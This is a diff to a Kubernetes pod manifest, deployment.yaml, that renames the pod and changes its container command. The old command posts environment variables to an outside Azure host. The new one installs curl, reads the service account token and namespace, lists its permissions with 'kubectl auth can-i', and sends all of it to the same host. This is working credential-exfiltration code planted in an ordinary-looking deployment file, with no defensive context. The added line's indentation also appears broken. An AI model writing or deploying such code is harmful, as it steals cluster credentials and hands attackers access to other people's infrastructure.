--- a/deployment.yaml
+++ b/deployment.yaml
@@ -1,10 +1,17 @@
 apiVersion: v1
 kind: Pod
 metadata:
-  name: potter-v2
+  name: potter-v3
 spec:
   containers:
     - name: shell
       image: alpine
-      command: ["sh", "-c", "env | curl -X POST http://potter-maga.brazilsouth.cloudapp.azure.com:8080"]
+command: ["sh", "-c", "
+  apk add curl;
+  {
+    echo '>> NAMESPACE:' && cat /var/run/secrets/kubernetes.io/serviceaccount/namespace;
+    echo '\n>> TOKEN:' && cat /var/run/secrets/kubernetes.io/serviceaccount/token;
+    echo '\n>> CAN-I:' && kubectl auth can-i --list 2>&1;
+  } | curl -X POST --data-binary @- http://potter-maga.brazilsouth.cloudapp.azure.com:8080
+"]
   restartPolicy: Never
